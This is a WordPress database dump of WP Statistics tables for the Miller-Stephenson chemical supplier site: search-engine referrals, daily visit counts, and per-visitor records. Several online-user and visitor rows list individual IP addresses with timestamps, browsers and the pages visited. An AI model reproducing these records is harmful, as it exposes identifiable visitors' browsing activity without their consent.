INSERT INTO `wp_statistics_search` VALUES (3712, '2016-11-02', 'google', 'www.google.com', '', 14909); 
INSERT INTO `wp_statistics_search` VALUES (3713, '2016-11-02', 'google', 'www.google.com', '', 14911); 
INSERT INTO `wp_statistics_search` VALUES (3714, '2016-11-02', 'google', 'www.google.com', '', 14917); 
INSERT INTO `wp_statistics_search` VALUES (3715, '2016-11-02', 'google', 'www.google.com', '', 14920); 
INSERT INTO `wp_statistics_search` VALUES (3716, '2016-11-02', 'google', 'www.google.com', '', 14922); 
INSERT INTO `wp_statistics_search` VALUES (3717, '2016-11-02', 'google', 'www.google.com', '', 14928); 
INSERT INTO `wp_statistics_search` VALUES (3718, '2016-11-02', 'bing', 'www.bing.com', 'acrylic coating', 14929); 
INSERT INTO `wp_statistics_search` VALUES (3719, '2016-11-02', 'google', 'www.google.com', '', 14931); 
INSERT INTO `wp_statistics_search` VALUES (3720, '2016-11-02', 'bing', 'www.bing.com', 'stripping agents to cut epoxy', 14933); 
INSERT INTO `wp_statistics_search` VALUES (3721, '2016-11-02', 'bing', 'www.bing.com', '', 14938); 
INSERT INTO `wp_statistics_search` VALUES (3722, '2016-11-02', 'google', 'www.google.com', '', 14939); 
INSERT INTO `wp_statistics_search` VALUES (3723, '2016-11-02', 'google', 'www.google.ca', '', 14940); 
INSERT INTO `wp_statistics_search` VALUES (3724, '2016-11-02', 'bing', 'www.bing.com', '', 14941); 
INSERT INTO `wp_statistics_search` VALUES (3725, '2016-11-02', 'google', 'www.google.ro', '', 14942); 
INSERT INTO `wp_statistics_search` VALUES (3726, '2016-11-02', 'google', 'www.google.co.jp', '', 14943); 
INSERT INTO `wp_statistics_search` VALUES (3727, '2016-11-02', 'google', 'www.google.com', '', 14945); 
INSERT INTO `wp_statistics_search` VALUES (3728, '2016-11-02', 'google', 'www.google.com', '', 14946); 
INSERT INTO `wp_statistics_search` VALUES (3729, '2016-11-02', 'google', 'www.google.com', '', 14947); 
INSERT INTO `wp_statistics_search` VALUES (3730, '2016-11-02', 'google', 'www.google.com', '', 14948); 
INSERT INTO `wp_statistics_search` VALUES (3731, '2016-11-02', 'google', 'www.google.com', '', 14950); 
INSERT INTO `wp_statistics_search` VALUES (3732, '2016-11-02', 'google', 'www.google.ca', '', 14951); 
INSERT INTO `wp_statistics_search` VALUES (3733, '2016-11-02', 'google', 'www.google.com', '', 14953); 
INSERT INTO `wp_statistics_search` VALUES (3734, '2016-11-02', 'google', 'www.google.com', '', 14956); 
INSERT INTO `wp_statistics_search` VALUES (3735, '2016-11-02', 'google', 'www.google.com', '', 14957); 
INSERT INTO `wp_statistics_search` VALUES (3736, '2016-11-02', 'google', 'www.google.com', '', 14959); 
INSERT INTO `wp_statistics_search` VALUES (3737, '2016-11-02', 'bing', 'www.bing.com', 'MILLER-STEPHENSON CHEMICAL', 14960); 
INSERT INTO `wp_statistics_search` VALUES (3738, '2016-11-02', 'google', 'www.google.com', '', 14962); 
INSERT INTO `wp_statistics_search` VALUES (3739, '2016-11-02', 'google', 'www.google.com', '', 14963); 
INSERT INTO `wp_statistics_search` VALUES (3740, '2016-11-02', 'google', 'www.google.com', '', 14964); 
INSERT INTO `wp_statistics_search` VALUES (3741, '2016-11-02', 'google', 'www.google.com', '', 14965); 
INSERT INTO `wp_statistics_search` VALUES (3742, '2016-11-02', 'bing', 'www.bing.com', '', 14970); 
INSERT INTO `wp_statistics_search` VALUES (3743, '2016-11-02', 'google', 'www.google.co.il', '', 14972); 
INSERT INTO `wp_statistics_search` VALUES (3744, '2016-11-02', 'google', 'www.google.com', '', 14973); 
INSERT INTO `wp_statistics_search` VALUES (3745, '2016-11-02', 'google', 'www.google.com.ar', '', 14975); 
INSERT INTO `wp_statistics_search` VALUES (3746, '2016-11-02', 'google', 'www.google.com', '', 14980); 
INSERT INTO `wp_statistics_search` VALUES (3747, '2016-11-02', 'google', 'www.google.com', '', 14982); 
INSERT INTO `wp_statistics_search` VALUES (3748, '2016-11-02', 'google', 'www.google.com', '', 14983); 
INSERT INTO `wp_statistics_search` VALUES (3749, '2016-11-02', 'google', 'www.google.ca', '', 14984); 
INSERT INTO `wp_statistics_search` VALUES (3750, '2016-11-02', 'google', 'www.google.com', '', 14987); 
INSERT INTO `wp_statistics_search` VALUES (3751, '2016-11-02', 'google', 'www.google.com', '', 14989); 
INSERT INTO `wp_statistics_search` VALUES (3752, '2016-11-02', 'google', 'www.google.com', '', 14990); 
INSERT INTO `wp_statistics_search` VALUES (3753, '2016-11-02', 'google', 'www.google.ca', '', 14991); 
INSERT INTO `wp_statistics_search` VALUES (3754, '2016-11-02', 'google', 'www.google.com', '', 14992); 
INSERT INTO `wp_statistics_search` VALUES (3755, '2016-11-02', 'google', 'www.google.com', '', 14993); 
INSERT INTO `wp_statistics_search` VALUES (3756, '2016-11-02', 'google', 'www.google.com', '', 14996); 
INSERT INTO `wp_statistics_search` VALUES (3757, '2016-11-02', 'google', 'www.google.com', '', 14997); 
INSERT INTO `wp_statistics_search` VALUES (3758, '2016-11-02', 'google', 'www.google.ca', '', 14998); 
INSERT INTO `wp_statistics_search` VALUES (3759, '2016-11-02', 'google', 'www.google.com', '', 15001); 
INSERT INTO `wp_statistics_search` VALUES (3760, '2016-11-02', 'google', 'www.google.com', '', 15002); 
INSERT INTO `wp_statistics_search` VALUES (3761, '2016-11-02', 'google', 'www.google.com', '', 15003); 
INSERT INTO `wp_statistics_search` VALUES (3762, '2016-11-02', 'google', 'www.google.com', '', 15007); 
INSERT INTO `wp_statistics_search` VALUES (3763, '2016-11-02', 'bing', 'www.bing.com', '', 15012); 
INSERT INTO `wp_statistics_search` VALUES (3764, '2016-11-02', 'google', 'www.google.com', '', 15014); 
INSERT INTO `wp_statistics_search` VALUES (3765, '2016-11-02', 'google', 'www.google.com', '', 15015); 
INSERT INTO `wp_statistics_search` VALUES (3766, '2016-11-02', 'google', 'www.google.com', '', 15017); 
INSERT INTO `wp_statistics_search` VALUES (3767, '2016-11-02', 'google', 'www.google.com', '', 15020); 
INSERT INTO `wp_statistics_search` VALUES (3768, '2016-11-02', 'google', 'www.google.com', '', 15023); 
INSERT INTO `wp_statistics_search` VALUES (3769, '2016-11-02', 'google', 'www.google.com', '', 15024); 
INSERT INTO `wp_statistics_search` VALUES (3770, '2016-11-02', 'google', 'www.google.com', '', 15025); 
INSERT INTO `wp_statistics_search` VALUES (3771, '2016-11-02', 'google', 'www.google.com', '', 15026); 
INSERT INTO `wp_statistics_search` VALUES (3772, '2016-11-02', 'yahoo', 'r.search.yahoo.com', '', 15027); 
INSERT INTO `wp_statistics_search` VALUES (3773, '2016-11-02', 'google', 'www.google.com', '', 15029); 
INSERT INTO `wp_statistics_search` VALUES (3774, '2016-11-02', 'google', 'www.google.com', '', 15030); 
INSERT INTO `wp_statistics_search` VALUES (3775, '2016-11-02', 'google', 'www.google.com', '', 15031); 
INSERT INTO `wp_statistics_search` VALUES (3776, '2016-11-02', 'google', 'www.google.com', '', 15033); 
INSERT INTO `wp_statistics_search` VALUES (3777, '2016-11-02', 'google', 'www.google.com', '', 15034); 
INSERT INTO `wp_statistics_search` VALUES (3778, '2016-11-02', 'google', 'www.google.com', '', 15036); 
INSERT INTO `wp_statistics_search` VALUES (3779, '2016-11-02', 'google', 'www.google.com', '', 15037); 
INSERT INTO `wp_statistics_search` VALUES (3780, '2016-11-02', 'google', 'www.google.com', '', 15038); 
INSERT INTO `wp_statistics_search` VALUES (3781, '2016-11-03', 'google', 'www.google.ca', '', 15045); 
INSERT INTO `wp_statistics_search` VALUES (3782, '2016-11-03', 'google', 'www.google.com', '', 15046); 
INSERT INTO `wp_statistics_search` VALUES (3783, '2016-11-03', 'google', 'www.google.com', '', 15048); 
INSERT INTO `wp_statistics_search` VALUES (3784, '2016-11-03', 'google', 'www.google.com', '', 15049); 
INSERT INTO `wp_statistics_search` VALUES (3785, '2016-11-03', 'google', 'www.google.com', '', 15060); 
INSERT INTO `wp_statistics_search` VALUES (3786, '2016-11-03', 'google', 'www.google.com', '', 15061); 
INSERT INTO `wp_statistics_search` VALUES (3787, '2016-11-03', 'google', 'www.google.com', '', 15062); 
INSERT INTO `wp_statistics_search` VALUES (3788, '2016-11-03', 'google', 'www.google.co.kr', '', 15064); 
INSERT INTO `wp_statistics_search` VALUES (3789, '2016-11-03', 'google', 'www.google.com', '', 15065); 
INSERT INTO `wp_statistics_search` VALUES (3790, '2016-11-03', 'google', 'www.google.com', '', 15067); 
INSERT INTO `wp_statistics_search` VALUES (3791, '2016-11-03', 'google', 'com.google.android.googlequicksearchbox', '', 15068); 
INSERT INTO `wp_statistics_search` VALUES (3792, '2016-11-03', 'google', 'www.google.fr', '', 15071); 
INSERT INTO `wp_statistics_search` VALUES (3793, '2016-11-03', 'google', 'www.google.com', '', 15074); 
INSERT INTO `wp_statistics_search` VALUES (3794, '2016-11-03', 'google', 'www.google.com', '', 15076); 
INSERT INTO `wp_statistics_search` VALUES (3795, '2016-11-03', 'google', 'www.google.it', '', 15077); 
INSERT INTO `wp_statistics_search` VALUES (3796, '2016-11-03', 'google', 'www.google.com', '', 15080); 
INSERT INTO `wp_statistics_search` VALUES (3797, '2016-11-03', 'google', 'www.google.com', '', 15083); 
INSERT INTO `wp_statistics_search` VALUES (3798, '2016-11-03', 'google', 'www.google.ru', '', 15085); 
INSERT INTO `wp_statistics_search` VALUES (3799, '2016-11-03', 'google', 'www.google.fr', '', 15086); 
INSERT INTO `wp_statistics_search` VALUES (3800, '2016-11-03', 'google', 'www.google.es', '', 15089); 
INSERT INTO `wp_statistics_search` VALUES (3801, '2016-11-03', 'google', 'www.google.com', '', 15090); 
INSERT INTO `wp_statistics_search` VALUES (3802, '2016-11-03', 'google', 'www.google.com', '', 15091); 
INSERT INTO `wp_statistics_search` VALUES (3803, '2016-11-03', 'google', 'www.google.com', '', 15092); 
INSERT INTO `wp_statistics_search` VALUES (3804, '2016-11-03', 'google', 'www.google.com', '', 15093); 
INSERT INTO `wp_statistics_search` VALUES (3805, '2016-11-03', 'google', 'www.google.com', '', 15095); 
INSERT INTO `wp_statistics_search` VALUES (3806, '2016-11-03', 'google', 'www.google.com', '', 15097); 
INSERT INTO `wp_statistics_search` VALUES (3807, '2016-11-03', 'google', 'www.google.com', '', 15099); 
INSERT INTO `wp_statistics_search` VALUES (3808, '2016-11-03', 'google', 'www.google.com', '', 15100); 
INSERT INTO `wp_statistics_search` VALUES (3809, '2016-11-03', 'google', 'www.google.com', '', 15102); 
INSERT INTO `wp_statistics_search` VALUES (3810, '2016-11-03', 'google', 'www.google.com', '', 15104); 
INSERT INTO `wp_statistics_search` VALUES (3811, '2016-11-03', 'google', 'www.google.com', '', 15105); 
INSERT INTO `wp_statistics_search` VALUES (3812, '2016-11-03', 'google', 'www.google.com', '', 15108); 
INSERT INTO `wp_statistics_search` VALUES (3813, '2016-11-03', 'google', 'www.google.com', '', 15109); 
INSERT INTO `wp_statistics_search` VALUES (3814, '2016-11-03', 'google', 'www.google.de', '', 15111); 
INSERT INTO `wp_statistics_search` VALUES (3815, '2016-11-03', 'google', 'www.google.com', '', 15114); 
INSERT INTO `wp_statistics_search` VALUES (3816, '2016-11-03', 'google', 'www.google.com', '', 15118); 
INSERT INTO `wp_statistics_search` VALUES (3817, '2016-11-03', 'google', 'www.google.com', '', 15120); 
INSERT INTO `wp_statistics_search` VALUES (3818, '2016-11-03', 'google', 'www.google.com', '', 15124); 
INSERT INTO `wp_statistics_search` VALUES (3819, '2016-11-03', 'google', 'www.google.com', '', 15127); 
INSERT INTO `wp_statistics_search` VALUES (3820, '2016-11-03', 'google', 'www.google.com', '', 15128); 
INSERT INTO `wp_statistics_search` VALUES (3821, '2016-11-03', 'google', 'www.google.com', '', 15129); 
INSERT INTO `wp_statistics_search` VALUES (3822, '2016-11-03', 'google', 'www.google.com', '', 15130); 
INSERT INTO `wp_statistics_search` VALUES (3823, '2016-11-03', 'google', 'www.google.com', '', 15136); 
INSERT INTO `wp_statistics_search` VALUES (3824, '2016-11-03', 'google', 'www.google.com', '', 15137); 
INSERT INTO `wp_statistics_search` VALUES (3825, '2016-11-03', 'google', 'www.google.com', 'miller stephenson 907 epoxy', 15139); 
INSERT INTO `wp_statistics_search` VALUES (3826, '2016-11-03', 'google', 'www.google.ca', '', 15143); 
INSERT INTO `wp_statistics_search` VALUES (3827, '2016-11-03', 'google', 'www.google.com', '', 15144); 
INSERT INTO `wp_statistics_search` VALUES (3828, '2016-11-03', 'google', 'com.google.android.googlequicksearchbox', '', 15145); 
INSERT INTO `wp_statistics_search` VALUES (3829, '2016-11-03', 'google', 'www.google.com', '', 15146); 
INSERT INTO `wp_statistics_search` VALUES (3830, '2016-11-03', 'google', 'www.google.com', '', 15147); 
INSERT INTO `wp_statistics_search` VALUES (3831, '2016-11-03', 'google', 'www.google.com', '', 15148); 
INSERT INTO `wp_statistics_search` VALUES (3832, '2016-11-03', 'google', 'www.google.com', '', 15149); 
INSERT INTO `wp_statistics_search` VALUES (3833, '2016-11-03', 'google', 'www.google.com', '', 15152); 
INSERT INTO `wp_statistics_search` VALUES (3834, '2016-11-03', 'google', 'www.google.com', '', 15154); 
INSERT INTO `wp_statistics_search` VALUES (3835, '2016-11-03', 'google', 'www.google.com', '', 15155); 
INSERT INTO `wp_statistics_search` VALUES (3836, '2016-11-03', 'google', 'www.google.com', '', 15156); 
INSERT INTO `wp_statistics_search` VALUES (3837, '2016-11-03', 'bing', 'www.bing.com', 'miller stepenson 904 epoxy', 15157); 
INSERT INTO `wp_statistics_search` VALUES (3838, '2016-11-03', 'google', 'www.google.com', '', 15161); 
INSERT INTO `wp_statistics_search` VALUES (3839, '2016-11-03', 'google', 'www.google.ee', '', 15162); 
INSERT INTO `wp_statistics_search` VALUES (3840, '2016-11-03', 'google', 'www.google.com.au', '', 15163); 
INSERT INTO `wp_statistics_search` VALUES (3841, '2016-11-03', 'google', 'www.google.com', '', 15164); 
INSERT INTO `wp_statistics_search` VALUES (3842, '2016-11-03', 'google', 'www.google.com', '', 15165); 
INSERT INTO `wp_statistics_search` VALUES (3843, '2016-11-03', 'google', 'www.google.ca', '', 15166); 
INSERT INTO `wp_statistics_search` VALUES (3844, '2016-11-03', 'google', 'www.google.com', '', 15167); 
INSERT INTO `wp_statistics_search` VALUES (3845, '2016-11-03', 'google', 'www.google.com', '', 15173); 
INSERT INTO `wp_statistics_search` VALUES (3846, '2016-11-03', 'google', 'www.google.com', '', 15174); 
INSERT INTO `wp_statistics_search` VALUES (3847, '2016-11-03', 'google', 'www.google.com', '', 15175); 
INSERT INTO `wp_statistics_search` VALUES (3848, '2016-11-03', 'google', 'www.google.com', '', 15176); 
INSERT INTO `wp_statistics_search` VALUES (3849, '2016-11-03', 'yahoo', 'r.search.yahoo.com', '', 15177); 
INSERT INTO `wp_statistics_search` VALUES (3850, '2016-11-03', 'google', 'www.google.com', '', 15180); 
INSERT INTO `wp_statistics_search` VALUES (3851, '2016-11-03', 'yahoo', 'r.search.yahoo.com', '', 15182); 
INSERT INTO `wp_statistics_search` VALUES (3852, '2016-11-03', 'google', 'www.google.com', '', 15185); 
INSERT INTO `wp_statistics_search` VALUES (3853, '2016-11-03', 'google', 'www.google.com', '', 15186); 
INSERT INTO `wp_statistics_search` VALUES (3854, '2016-11-03', 'bing', 'www.bing.com', 'krytox 206', 15187); 
INSERT INTO `wp_statistics_search` VALUES (3855, '2016-11-03', 'google', 'www.google.com', '', 15189); 
INSERT INTO `wp_statistics_search` VALUES (3856, '2016-11-03', 'google', 'www.google.com', '', 15193); 
INSERT INTO `wp_statistics_search` VALUES (3857, '2016-11-03', 'bing', 'www.bing.com', 'miller stephenson danbury ct', 15197); 
INSERT INTO `wp_statistics_search` VALUES (3858, '2016-11-03', 'google', 'www.google.com', '', 15202); 
INSERT INTO `wp_statistics_search` VALUES (3859, '2016-11-03', 'google', 'www.google.com', '', 15203); 
INSERT INTO `wp_statistics_search` VALUES (3860, '2016-11-03', 'google', 'www.google.co.in', '', 15204); 
INSERT INTO `wp_statistics_search` VALUES (3861, '2016-11-03', 'google', 'www.google.com', '', 15207); 
INSERT INTO `wp_statistics_search` VALUES (3862, '2016-11-03', 'google', 'www.google.com', '', 15209); 
INSERT INTO `wp_statistics_search` VALUES (3863, '2016-11-03', 'google', 'www.google.com', '', 15212); 
INSERT INTO `wp_statistics_search` VALUES (3864, '2016-11-03', 'google', 'www.google.com', '', 15213); 
INSERT INTO `wp_statistics_search` VALUES (3865, '2016-11-03', 'google', 'www.google.com', '', 15214); 
INSERT INTO `wp_statistics_search` VALUES (3866, '2016-11-03', 'bing', 'www.bing.com', '', 15218); 
INSERT INTO `wp_statistics_search` VALUES (3867, '2016-11-03', 'google', 'www.google.com', '', 15219); 
INSERT INTO `wp_statistics_search` VALUES (3868, '2016-11-03', 'google', 'www.google.com', '', 15220); 
INSERT INTO `wp_statistics_search` VALUES (3869, '2016-11-03', 'yahoo', 'r.search.yahoo.com', '', 15222); 
INSERT INTO `wp_statistics_search` VALUES (3870, '2016-11-03', 'bing', 'www.bing.com', 'EPON 828 SDS', 15223); 
INSERT INTO `wp_statistics_search` VALUES (3871, '2016-11-03', 'google', 'www.google.com', '', 15225); 
INSERT INTO `wp_statistics_search` VALUES (3872, '2016-11-03', 'google', 'www.google.com', '', 15232); 
INSERT INTO `wp_statistics_search` VALUES (3873, '2016-11-03', 'google', 'www.google.com', '', 15235); 
INSERT INTO `wp_statistics_search` VALUES (3874, '2016-11-03', 'google', 'www.google.com', '', 15237); 
INSERT INTO `wp_statistics_search` VALUES (3875, '2016-11-03', 'google', 'www.google.com', '', 15238); 
INSERT INTO `wp_statistics_search` VALUES (3876, '2016-11-03', 'google', 'www.google.com', '', 15253); 
INSERT INTO `wp_statistics_search` VALUES (3877, '2016-11-03', 'google', 'www.google.com', '', 15254); 
INSERT INTO `wp_statistics_search` VALUES (3878, '2016-11-03', 'google', 'www.google.com', '', 15256); 
INSERT INTO `wp_statistics_search` VALUES (3879, '2016-11-04', 'google', 'www.google.com', '', 15260); 
INSERT INTO `wp_statistics_search` VALUES (3880, '2016-11-04', 'google', 'www.google.com', '', 15268); 
INSERT INTO `wp_statistics_search` VALUES (3881, '2016-11-04', 'google', 'www.google.com', '', 15271); 
INSERT INTO `wp_statistics_search` VALUES (3882, '2016-11-04', 'bing', 'www.bing.com', 'ms-472c', 15273); 
INSERT INTO `wp_statistics_search` VALUES (3883, '2016-11-04', 'google', 'www.google.com', '', 15276); 
INSERT INTO `wp_statistics_search` VALUES (3884, '2016-11-04', 'google', 'www.google.com', '', 15277); 
INSERT INTO `wp_statistics_search` VALUES (3885, '2016-11-04', 'google', 'www.google.com', '', 15282); 
INSERT INTO `wp_statistics_search` VALUES (3886, '2016-11-04', 'bing', 'www.bing.com', '', 15286); 
INSERT INTO `wp_statistics_search` VALUES (3887, '2016-11-04', 'google', 'www.google.com.sg', '', 15287); 
INSERT INTO `wp_statistics_search` VALUES (3888, '2016-11-04', 'google', 'www.google.com', '', 15288); 
INSERT INTO `wp_statistics_search` VALUES (3889, '2016-11-04', 'google', 'www.google.co.jp', '', 15298); 
INSERT INTO `wp_statistics_search` VALUES (3890, '2016-11-04', 'google', 'www.google.com', '', 15304); 
INSERT INTO `wp_statistics_search` VALUES (3891, '2016-11-04', 'google', 'www.google.ca', '', 15311); 
INSERT INTO `wp_statistics_search` VALUES (3892, '2016-11-04', 'google', 'www.google.com.hk', '', 15320); 
INSERT INTO `wp_statistics_search` VALUES (3893, '2016-11-04', 'google', 'www.google.com', '', 15321); 
INSERT INTO `wp_statistics_search` VALUES (3894, '2016-11-04', 'google', 'www.google.com.hk', '', 15326); 
INSERT INTO `wp_statistics_search` VALUES (3895, '2016-11-04', 'google', 'www.google.com', '', 15329); 
INSERT INTO `wp_statistics_search` VALUES (3896, '2016-11-04', 'google', 'www.google.co.in', '', 15334); 
INSERT INTO `wp_statistics_search` VALUES (3897, '2016-11-04', 'google', 'www.google.com.tr', '', 15336); 
INSERT INTO `wp_statistics_search` VALUES (3898, '2016-11-04', 'yahoo', 'tw.search.yahoo.com', '', 15337); 
INSERT INTO `wp_statistics_search` VALUES (3899, '2016-11-04', 'google', 'www.google.co.uk', '', 15338); 
INSERT INTO `wp_statistics_search` VALUES (3900, '2016-11-04', 'google', 'www.google.de', '', 15341); 
INSERT INTO `wp_statistics_search` VALUES (3901, '2016-11-04', 'google', 'www.google.com', '', 15343); 
INSERT INTO `wp_statistics_search` VALUES (3902, '2016-11-04', 'google', 'www.google.de', '', 15346); 
INSERT INTO `wp_statistics_search` VALUES (3903, '2016-11-04', 'google', 'www.google.com.sg', '', 15349); 
INSERT INTO `wp_statistics_search` VALUES (3904, '2016-11-04', 'google', 'www.google.co.jp', '', 15352); 
INSERT INTO `wp_statistics_search` VALUES (3905, '2016-12-08', 'google', 'www.google.com', '', 15355); 
INSERT INTO `wp_statistics_search` VALUES (3906, '2016-12-08', 'google', 'www.google.ca', '', 15358);
#
# End of data contents of table `wp_statistics_search`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_statistics_useronline`


#
# Delete any existing table `wp_statistics_useronline`
#

DROP TABLE IF EXISTS `wp_statistics_useronline`;


#
# Table structure of table `wp_statistics_useronline`
#

CREATE TABLE `wp_statistics_useronline` (
  `ID` int(11) NOT NULL AUTO_INCREMENT,
  `ip` varchar(60) NOT NULL,
  `created` int(11) DEFAULT NULL,
  `timestamp` int(10) NOT NULL,
  `date` datetime NOT NULL,
  `referred` text NOT NULL,
  `agent` varchar(255) NOT NULL,
  `platform` varchar(255) DEFAULT NULL,
  `version` varchar(255) DEFAULT NULL,
  `location` varchar(10) DEFAULT NULL,
  PRIMARY KEY (`ID`)
) ENGINE=MyISAM AUTO_INCREMENT=26509 DEFAULT CHARSET=utf8 ;

#
# Data contents of table `wp_statistics_useronline`
#
 
INSERT INTO `wp_statistics_useronline` VALUES (26507, '129.110.241.63', 1481223574, 1481223595, '2016-12-08 18:59:55', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '54.0.2840.99', '000'); 
INSERT INTO `wp_statistics_useronline` VALUES (26508, '221.151.95.75', 1481223579, 1481223587, '2016-12-08 18:59:47', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '11.0', '000'); 
INSERT INTO `wp_statistics_useronline` VALUES (26506, '166.137.10.20', 1481223564, 1481223568, '2016-12-08 18:59:28', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/krytox-lubricants/?gclid=CIjcsOKj5dACFY09gQodmr4Fhg', 'Safari', 'iPhone', '600.1.4', '000');
#
# End of data contents of table `wp_statistics_useronline`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_statistics_visit`


#
# Delete any existing table `wp_statistics_visit`
#

DROP TABLE IF EXISTS `wp_statistics_visit`;


#
# Table structure of table `wp_statistics_visit`
#

CREATE TABLE `wp_statistics_visit` (
  `ID` int(11) NOT NULL AUTO_INCREMENT,
  `last_visit` datetime NOT NULL,
  `last_counter` date NOT NULL,
  `visit` int(10) NOT NULL,
  PRIMARY KEY (`ID`),
  UNIQUE KEY `unique_date` (`last_counter`)
) ENGINE=MyISAM AUTO_INCREMENT=34 DEFAULT CHARSET=utf8 ;

#
# Data contents of table `wp_statistics_visit`
#
 
INSERT INTO `wp_statistics_visit` VALUES (1, '2016-10-04 23:56:53', '2016-10-04', 623); 
INSERT INTO `wp_statistics_visit` VALUES (2, '2016-10-05 23:59:58', '2016-10-05', 2707); 
INSERT INTO `wp_statistics_visit` VALUES (3, '2016-10-06 23:55:00', '2016-10-06', 3250); 
INSERT INTO `wp_statistics_visit` VALUES (4, '2016-10-07 23:59:56', '2016-10-07', 3220); 
INSERT INTO `wp_statistics_visit` VALUES (5, '2016-10-08 23:56:42', '2016-10-08', 1886); 
INSERT INTO `wp_statistics_visit` VALUES (6, '2016-10-09 23:58:46', '2016-10-09', 2112); 
INSERT INTO `wp_statistics_visit` VALUES (7, '2016-10-10 23:56:19', '2016-10-10', 10858); 
INSERT INTO `wp_statistics_visit` VALUES (8, '2016-10-11 23:59:43', '2016-10-11', 6640); 
INSERT INTO `wp_statistics_visit` VALUES (9, '2016-10-12 23:53:31', '2016-10-12', 8616); 
INSERT INTO `wp_statistics_visit` VALUES (10, '2016-10-13 23:59:49', '2016-10-13', 3733); 
INSERT INTO `wp_statistics_visit` VALUES (11, '2016-10-14 23:59:53', '2016-10-14', 2028); 
INSERT INTO `wp_statistics_visit` VALUES (12, '2016-10-15 23:53:20', '2016-10-15', 1745); 
INSERT INTO `wp_statistics_visit` VALUES (13, '2016-10-16 23:55:09', '2016-10-16', 1350); 
INSERT INTO `wp_statistics_visit` VALUES (14, '2016-10-17 23:57:23', '2016-10-17', 3265); 
INSERT INTO `wp_statistics_visit` VALUES (15, '2016-10-18 23:58:55', '2016-10-18', 2876); 
INSERT INTO `wp_statistics_visit` VALUES (16, '2016-10-19 19:42:33', '2016-10-19', 3557); 
INSERT INTO `wp_statistics_visit` VALUES (17, '2016-10-20 23:59:42', '2016-10-20', 8275); 
INSERT INTO `wp_statistics_visit` VALUES (18, '2016-10-21 23:57:36', '2016-10-21', 3800); 
INSERT INTO `wp_statistics_visit` VALUES (19, '2016-10-22 23:58:27', '2016-10-22', 978); 
INSERT INTO `wp_statistics_visit` VALUES (20, '2016-10-23 23:58:36', '2016-10-23', 2841); 
INSERT INTO `wp_statistics_visit` VALUES (21, '2016-10-24 23:59:04', '2016-10-24', 3496); 
INSERT INTO `wp_statistics_visit` VALUES (22, '2016-10-25 23:59:04', '2016-10-25', 2963); 
INSERT INTO `wp_statistics_visit` VALUES (23, '2016-10-26 23:58:46', '2016-10-26', 4163); 
INSERT INTO `wp_statistics_visit` VALUES (24, '2016-10-27 23:59:45', '2016-10-27', 2799); 
INSERT INTO `wp_statistics_visit` VALUES (25, '2016-10-28 23:57:53', '2016-10-28', 1819); 
INSERT INTO `wp_statistics_visit` VALUES (26, '2016-10-29 23:58:52', '2016-10-29', 786); 
INSERT INTO `wp_statistics_visit` VALUES (27, '2016-10-30 23:53:51', '2016-10-30', 764); 
INSERT INTO `wp_statistics_visit` VALUES (28, '2016-10-31 23:49:02', '2016-10-31', 1937); 
INSERT INTO `wp_statistics_visit` VALUES (29, '2016-11-01 23:52:53', '2016-11-01', 2152); 
INSERT INTO `wp_statistics_visit` VALUES (30, '2016-11-02 20:46:48', '2016-11-02', 1952); 
INSERT INTO `wp_statistics_visit` VALUES (31, '2016-11-03 19:29:53', '2016-11-03', 1961); 
INSERT INTO `wp_statistics_visit` VALUES (32, '2016-11-04 09:51:11', '2016-11-04', 356); 
INSERT INTO `wp_statistics_visit` VALUES (33, '2016-12-08 19:03:22', '2016-12-08', 18);
#
# End of data contents of table `wp_statistics_visit`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_statistics_visitor`


#
# Delete any existing table `wp_statistics_visitor`
#

DROP TABLE IF EXISTS `wp_statistics_visitor`;


#
# Table structure of table `wp_statistics_visitor`
#

CREATE TABLE `wp_statistics_visitor` (
  `ID` int(11) NOT NULL AUTO_INCREMENT,
  `last_counter` date NOT NULL,
  `referred` text NOT NULL,
  `agent` varchar(255) NOT NULL,
  `platform` varchar(255) DEFAULT NULL,
  `version` varchar(255) DEFAULT NULL,
  `UAString` varchar(255) DEFAULT NULL,
  `ip` varchar(60) NOT NULL,
  `location` varchar(10) DEFAULT NULL,
  `hits` int(11) DEFAULT NULL,
  `honeypot` int(11) DEFAULT NULL,
  PRIMARY KEY (`ID`),
  UNIQUE KEY `date_ip_agent` (`last_counter`,`ip`,`agent`(75),`platform`(75),`version`(75)),
  KEY `agent` (`agent`),
  KEY `platform` (`platform`),
  KEY `version` (`version`),
  KEY `location` (`location`)
) ENGINE=MyISAM AUTO_INCREMENT=15359 DEFAULT CHARSET=utf8 ;

#
# Data contents of table `wp_statistics_visitor`
#
 
INSERT INTO `wp_statistics_visitor` VALUES (1, '2016-10-04', 'https://www.miller-stephenson.com/wp-admin/plugin-install.php?s=statistics&tab=search&type=term', 'Chrome', 'Windows', '53.0.2785.143', '', '24.63.154.108', '000', NULL, NULL); 
INSERT INTO `wp_statistics_visitor` VALUES (2, '2016-10-04', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '11.0', '', '12.216.166.131', '000', 22, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3, '2016-10-04', 'https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/', 'Chrome', 'Windows', '53.0.2785.143', '', '192.31.242.67', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4, '2016-10-04', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '127.0.0.1', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5, '2016-10-04', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/tribosys/connector-lubricants/', 'Firefox', 'Windows', '49.0', '', '12.205.160.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6, '2016-10-04', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '139.162.228.24', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7, '2016-10-04', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '198.175.154.212', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8, '2016-10-04', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '143.215.126.222', '000', 2, 0); 
